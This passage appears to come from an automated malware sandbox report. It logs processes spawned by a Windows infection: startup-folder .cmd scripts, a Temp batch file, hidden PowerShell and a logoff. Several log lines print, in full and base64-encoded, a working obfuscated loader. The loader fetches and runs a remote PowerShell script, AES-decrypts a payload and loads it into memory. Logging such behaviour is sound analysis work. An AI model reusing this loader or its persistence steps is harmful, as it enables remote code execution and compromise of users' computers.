cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe shutdown.exe -L
                Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3f5c055 /state1:0x41c64e6d
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f66055 /state1:0x41c64e6d
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f76055 /state1:0x41c64e6d
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dwm.exe "dwm.exe"
                Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f7d855 /state1:0x41c64e6d
                Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f05055 /state1:0x41c64e6d
                Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f0c855 /state1:0x41c64e6d
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe shutdown.exe -LJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" Jump to behavior
